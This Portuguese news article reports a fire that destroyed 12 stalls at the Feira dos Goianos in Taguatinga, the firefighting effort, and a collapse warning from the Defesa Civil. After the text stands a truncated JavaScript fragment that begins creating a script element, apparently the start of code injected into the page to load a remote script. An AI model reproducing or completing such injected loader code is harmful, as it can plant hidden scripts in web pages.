Incêndio destrói 12 lojas na Feira dos Goianos

O fogo foi contido duas horas depois dos bombeiros iniciarem os trabalhos na feira  Foto: Reprodução/ Whatsapp/ CBM

Um incêndio de grandes proporções destruiu 12 bancas na Feira dos Goianos, em Taguatinga, na madrugada desta terça-feira. A Defesa Civil alerta para o risco de desabamento do galpão, que abriga 950 lojas.

A Defesa Civil determinou que o proprietário do galpão contratasse um técnico para cuidar do escoramento e isolamento da estrutura. “Determinamos que um engenheiro ou arquiteto fosse contratado pelo proprietário, que já atendeu à reivindicação. Assim que ficar pronto, a área vai ser liberada”, disse o coronel Sérgio Bezerra.  

Segundo os Bombeiros, o fogo foi isolado pelo 8ª Guarnição dos Bombeiros Militares às 2h05 desta terça-feira (24) e confinado em apenas um quadrante da feira, para não ser espalhado para as demais lojas. Após duas hora, os 53 bombeiros conseguiram conter o fogo no local.

O complexo de lojas está isolado e será liberado assim que o trabalho for encerrado. A perícia foi acionada para a investigação das causas que serão apontadas em um período inicial de 30 dias.

A proximidade entre as bancas e os materiais de fácil combustão dificultaram o trabalho das equipes da corporação que foram ao endereço.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário